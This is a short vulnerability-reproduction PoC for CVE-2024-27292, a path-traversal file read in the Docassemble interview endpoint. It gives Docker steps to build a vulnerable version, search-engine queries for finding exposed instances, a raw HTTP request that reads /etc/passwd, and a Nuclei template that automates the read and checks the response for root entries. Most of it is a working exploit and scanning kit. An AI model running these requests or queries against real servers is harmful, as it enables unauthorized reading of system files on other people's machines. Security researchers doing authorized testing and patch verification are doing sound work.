CVE-2024-27292 漏洞复现 POC

https://github.com/jhpyle/docassemble

git clone https://github.com/jhpyle/docassemblecd docassemblegit checkout v1.4.96docker build -t yourname/mydocassemble .cd ..docker run -d -p 80:80 -p 443:443 --restart always --stop-timeout 600 yourname/mydocassemble

icon_hash="-575790689"

GET /interview?i=/etc/passwd HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

http://x.x.x.x/interview?i=/etc/passwd

id: CVE-2024-27292info:  name: Docassemble任意文件读取漏洞  author: fgz  severity: high  description: |    Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.  reference:    - https://tantosec.com/blog/docassemble/    - https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv    - https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N    cvss-score: 7.5    cve-id: CVE-2024-27292    cwe-id: CWE-706    epss-score: 0.00043    epss-percentile: 0.0866  metadata:    verified: true    max-request: 1    shodan-query: http.title:"docassemble"    fofa-query: icon_hash="-575790689"  tags: cve,cve2024,docassemble,lfihttp:  - method: GET    path:      - "{{BaseURL}}/interview?i=/etc/passwd"    matchers-condition: and    matchers:      - type: regex        regex:          - "root:.*:0:0:"      - type: status        status:          - 501